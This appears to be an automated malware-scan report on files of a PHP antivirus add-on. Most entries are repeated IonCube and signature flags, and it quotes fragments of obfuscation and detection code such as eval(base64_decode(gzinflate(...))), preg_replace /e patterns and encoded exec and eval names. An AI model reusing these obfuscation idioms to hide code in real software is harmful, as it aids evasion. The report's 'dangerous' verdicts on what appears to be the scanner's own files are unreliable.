Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/email.php Size: 3.95 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/services/task_executor.php Size: 3.21 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/NotificationBuilder.php Size: 9.63 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/EmailChecker.php Size: 6.52 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/FoldersInfo.php Size: 2.57 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/SMTPEmailParams.php Size: 4.09 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Form.php Size: 10.92 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Client.php Size: 7.12 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/ISP.php Size: 3.36 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/EmailNotifBanner.php Size: 3.30 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/API.php Size: 5.12 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/View/ViewClientList.php Size: 5.99 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/View/ViewFolder.php Size: 2.32 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/View/ViewFolderList.php Size: 14.91 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/View/View.php Size: 2.79 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/View/ViewList.php Size: 7.80 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/View/ViewDomainList.php Size: 8.61 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/View/ViewFolderDetails.php Size: 23.21 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/ScannableFolder.php Size: 2.33 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Errors.php Size: 2.08 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Locale.php Size: 7.56 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/StatsManager.php Size: 10.99 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Settings.php Size: 11.59 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/EmailFactory.php Size: 3.14 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Template.php Size: 8.06 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Domain.php Size: 5.90 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/PermanentBanners.php Size: 6.39 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/User.php Size: 3.12 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/CurrentBanners.php Size: 2.95 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/XMLChanger.php Size: 5.99 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/EULA.php Size: 2.78 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Locales/en-EN.php Size: 9.97 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Locales/ru-RU.php Size: 12.19 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Application.php Size: 30.40 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 3
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Function strrev exec_strrev Line: 85 Dangerous Encoded Function `exec` [https://www.php.net/exec] |
CeXE
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/KeyValueStorage.php Size: 2.00 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/InfectedBanner.php Size: 5.55 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 3
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 7830f7a6 Line: 48 Dangerous Malware Signature (hash: 7830f7a6) |
n0cL
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Log.php Size: 1.98 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Server.php Size: 2.71 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/Banner.php Size: 6.05 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/lib/ScaforeTaskHelper.php Size: 15.25 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/scripts/mover.php Size: 7.39 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/tools/procu2.php Size: 1.39 MB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Warns: 8 Dangers: 22
| Description | Match |
|---|
Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'YTo1OntzOjEwOiJ3aXphcmQucGhwIjtzOjM3OiJjbGFzcyBXZWxjb21lU3RlcCBleHRlbmRzIENXaXphcmRTdGVwIjtzOjE3OiJ1cGRhdGVfY2xpZW50LnBocCI7czozNzoieyBDVXBkYXRlQ2xpZW50OjpBZGRNZXNzYWdlMkxvZygiZXhlYyI7czoxMToiaW5jbHVkZS5waHAiO3M6NDg6IkdMT0JBTFNbIlVTRVIiXS0+SXNBdXRob3JpemVkKCkgJiYgJGFyQXV0aFJlc3VsdCI7czo5OiJzdGFydC5waHAiO3M6NjA6IkJYX1JPT1QuJy9tb2R1bGVzL21haW4vY2xhc3Nlcy9nZW5lcmFsL3VwZGF0ZV9kYl91cGRhdGVyLnBocCI7czoxMDoiaGVscGVyLnBocCI7czo1ODoiSlBsdWdpbkhlbHBlcjo6Z2V0UGx1Z2luKCJzeXN0ZW0iLCJvbmVjbGlja2NoZWNrb3V0X3Z...
| Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YToxNTY1OntzOjM6IuKAqCI7czoxOiIgIjtzOjM6IuKAqSI7czoxOiIgIjtzOjM6IuGagCI7czoxOiIgIjtzOjM6IuKAgCI7czoxOiIgIjtzOjM6IuKAgSI7czoxOiIgIjtzOjM6IuKAgiI7czoxOiIgIjtzOjM6IuKAgyI7czoxOiIgIjtzOjM6IuKAhCI7czoxOiIgIjtzOjM6IuKAhSI7czoxOiIgIjtzOjM6IuKAhiI7czoxOiIgIjtzOjM6IuKAiCI7czoxOiIgIjtzOjM6IuKAiSI7czoxOiIgIjtzOjM6IuKAiiI7czoxOiIgIjtzOjM6IuKBnyI7czoxOiIgIjtzOjI6IsKgIjtzOjE6IiAiO3M6Mzoi4oCHIjtzOjE6IiAiO3M6Mzoi4oCvIjtzOjE6IiAiO3M6Mjoiw4IiO3M6MToiICI7czoyOiLfuiI7czoxOiJfIjtzOjM6Iu+5jSI7czoxOiJfIjtzOjM6Iu+5jiI...
| Exploit concat_vars_array Line: 1 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code |
$JYekrRTYM[2] . $JYekrRTYM[14] . $JYekrRTYM[13] . $JYekrRTYM[21] . $JYekrRTYM[4] . $JYekrRTYM[17] . $JYekrRTYM[19] . $JYekrRTYM[26] . $JYekrRTYM[20] . $JYekrRTYM[20] . $JYekrRTYM[3] . $JYekrRTYM[4] . $JYekrRTYM[2] . $JYekrRTYM[14] . $JYekrRTYM[3] . $JYekrRTYM[4]; return Helpers::convertToSafeFunc($jPnPLPZcMHgH) ? $jPnPLPZcMHgH($sBtUiFZaz) : ''; }
| Exploit eval_base64 Line: 1 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(gzinflate(base64_decode(\'' . $i0l1i10000011111100[6] . '\')
| Exploit eval_preg Line: 1 Dangerous RCE (Remote Code Execution), through PCRE (Perl compatible Regular Expression), allow remote attackers to execute arbitrary commands or code on the target machine |
preg_replace("/' . $i0l1i10000011111100[2] . '/e",\'\'', '\'\',"' . $i0l1i10000011111100[2] . '")
| Exploit execution Line: 1 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13(strrev(trim(file_get_contents($avdb_file)
| Exploit hex_char Line: 1 Dangerous Hex char is usually used for the obfuscation of malicious code |
\x5f
| Exploit ioncube_loader Line: 1 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
IonCube_loader
| Exploit md5_create_function Dangerous The `create_function` technique is usually used for the obfuscation of malicious code |
$md5 = md5($res); $res = base64_decode(str_replace($md5, '', strtr($i0l1i10000011111100[5], $i0l1i10000011111100[6], $i0l1i10000011111100[7]))); if (preg_match('~eval\((?:\$[^(]{0,50}\(){2}\$[^,]{0,50},\s{0,10}\'([^\']{1,500})\',\s{0,10}\'([^\']{1,500})\'\){3};~msi', $res, $match)) { $res = Helpers::replaceVarsFromArray($vars, $res); if (preg_match('~eval\(base64_decode\(strtr\(~msi', $res)) { $res = base64_decode(strtr($arr1, $match[1], $match[2])); } } } return $res; } private function deobfus...
| Exploit nano Line: 1 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$m[1]($m[2])
| Exploit reversed Line: 1 Dangerous Reverse function technique is used for the obfuscation of dangerous PHP functions |
ecalper_rts
| Exploit silenced_eval Line: 1 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval((?:\(\$[0O]+\[[\'"]\w+[\'"]\])
| Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] |
assert(', 'eval(', $string); $string = str_replace('@@slaquote@@', '\\\'', $string); $string = str_replace('@@sladquote@@', '\\"', $string); $string = str_replace("eval(''.", 'eval(', $string); $res = str_replace($find, $string, $str); if (strpos($string, 'gzinflate(\'') !== false) { $res = $this->deobfuscateEval(stripcslashes($res), []); } return $res; } private function deobfuscateEval($str, $i0l1i10000011111100) { if (preg_match('~\)+\..{0,30}base64_decode~msi', $str)) { $res = explode(').', ...
| Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function(\'', $cr_func, 2)); $func = implode(') {', explode('\',\'', $func, 2)); $func = substr($func, 0, -2) . '}'; $str = str_replace($cr_func, $func, $str); } return $str; } public static function calc($expr) { if (is_array($expr)) { $expr = $expr[0]; } $expr = str_replace([' ', "\r", "\n", "\t"], '', $expr); preg_match('~(chr|min|max|round)?\(([^\)]+)\)~msi', $expr, $expr_arr); if (@$expr_arr[1] == "m\x69\x6e" || @$expr_arr[1] == "m\x61\x78") { return $expr_arr[1](explode(',', $expr_a...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(?&c)\()?(?&c)rawurldecode(?&c)\((?&c)\3(?&c)\)(?&c)\s*\^\s*substr(?&c)\((?&c)str_repeat(?&c)\((?&c)\2,\s*(?&c)\((?&c)strlen(?&c)\((?&c)\3(?&c)\)(?&c)/strlen(?&c)\((?&c)\2(?&c)\)(?&c)\)(?&c)\s*\+\s*1(?&c)\)(?&c),\s*0,(?&c)\s*strlen(?&c)\((?&c)\3(?&c)\)(?&c)\)(?&c)\)(?:(?&c)\s*\.\s*\'{\'(?&c)\))?(?&c);~msi', "i\x64" => "x\x6f\x72F\x4e\x61m\x65", ], [ "f\x75\x6cl" => '~(\$\w{1,40})=base64_decode\(\'[^\']+\'\);(\$\w+)=base64_decode\(\'[^\']+\'\);(\$\w+)=base64_decode\(\'([^\']+)\'\);eval\(\1\(g...
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($i0l1i10000011010100, $i0l1i10000000100000, $return_var); $i0l1i10000000100000 = implode("\n", $i0l1i10000000100000); if (preg_match_all('~\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}~', $i0l1i10000000100000, $i0l1i10000011111100, PREG_PATTERN_ORDER)) { foreach ($i0l1i10000011111100[0] as $m) { $i0l1i10000000101010[] = $m; } } } return array_values(array_diff($i0l1i10000000101010, $i0l1i10000011011110)); } function check_elf($i0l1i10000010000100) { $firstFourBytes = ''; if ($fd = @fopen($i0l1i1000001...
| Function posix_setuid Warning Potentially dangerous function `posix_setuid` [https://www.php.net/posix_setuid] |
posix_setuid($info["u\x69\x64"]); echo('Running from ' . $info["u\x69\x64"] . ':' . $info["g\x69\x64"] . "\n"); } else { echo("Invalid username\n"); exit(-1); } } if (isset($i0l1i10000011000000s["e\x78\x74e\x6e\x64e\x64\x5fr\x65\x70o\x72\x74"]) || isset($i0l1i10000011000000s["e"])) { $extended_report = true; } if (isset($i0l1i10000011000000s['black-list'])) { $blacked_by_cloud_list_file = $i0l1i10000011000000s['black-list']; } if (isset($i0l1i10000011000000s["s\x69\x67n\x61\x74u\x72\x65"])) { $s...
| Function str_rot13 eval_str_rot13 Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
| Function str_rot13 exec_str_rot13 Line: 1 Dangerous Encoded Function `exec` [https://www.php.net/exec] |
RKRp
| Function strrev eval_strrev Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
lave
| Sign 11413268 Line: 1 Dangerous Malware Signature (hash: 11413268) |
eval(base64_decode(
| Sign 301ca578 Line: 1 Dangerous Malware Signature (hash: 301ca578) |
tmhapbzcerff
| Sign 34b7e999 Line: 1 Dangerous Malware Signature (hash: 34b7e999) |
dMT0JBTF
| Sign 43b0d90f Line: 1 Dangerous Malware Signature (hash: 43b0d90f) |
etalfnizg
| Sign 4a069524 Line: 1 Dangerous Malware Signature (hash: 4a069524) |
aW5jbHVkZ
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) |
n0cl
| Sign 963e968a Line: 1 Dangerous Malware Signature (hash: 963e968a) |
PHPJiaMi
| Sign d97f004d Line: 1 Dangerous Malware Signature (hash: d97f004d) |
zeXN0ZW
| Sign de12c454 Line: 1 Dangerous Malware Signature (hash: de12c454) |
VjaG
| Sign f9dc0a55 Line: 1 Dangerous Malware Signature (hash: f9dc0a55) |
'' . base64_decode
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/tools/ai-bolit.php Size: 1.79 MB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Warns: 20 Dangers: 81
| Description | Match |
|---|
Exploit base64_long Line: 2079 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
